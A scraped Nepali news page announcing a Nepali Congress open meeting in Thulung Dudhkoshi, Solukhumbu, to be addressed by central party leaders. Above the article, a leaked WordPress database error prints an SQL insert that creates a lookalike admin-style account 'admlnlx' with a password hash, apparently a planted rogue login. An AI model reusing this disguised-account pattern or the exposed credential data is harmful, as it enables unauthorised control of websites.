WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bt.Mcm6hLLx9RVmeSXdAAAewmaXdfX1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 17:48:32', '', 'admlnlx', 'admlnlx')

नेपाली काँग्रेस थुलुङदूधकोशीले मुक्लिमा खुला सभा गर्ने – Gaule Khabar

नेपाली काँग्रेस थुलुङदूधकोशीले मुक्लिमा खुला सभा गर्ने

नेपाली काँग्रेस थुलुङदूधकोशीले मुक्लिमा खुला सभा गर्ने

गाउँले न्युज, सोलुखुम्बु । नेपाली काँग्रेस थुलुङ दुध्कोशी गाउँपालिकाले खुला सभाको आयोजना गर्नेभएको छ ।
थुलुङदूधकोसी गाउँपालिकाको प्राङानमा फागुन ३ गते गर्ने खुला सभालाई सम्बोधन गर्न नेपाली काँग्रेसका महामन्त्रि डा. शशाङ्क कोईराला, केन्द्रिय सदस्य बलबहादुर केसी, धनराज गुरुङ र गगन थापा आउने नेपाली काँग्रेस थुलुङ दुधकोशी गाउँपालिका महेन्द्र दीप राईले जानकारी दिए ।
काग्रेसको संगठन विस्तार एवं सुदृढीकरणका लागि तथा नेकपा नेतृत्वको सरकारले गरेका गलत कामका विरुद्धमा जनातालाई सचेत गराउन सभाको आयोजना गरिएको सभापति राईले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका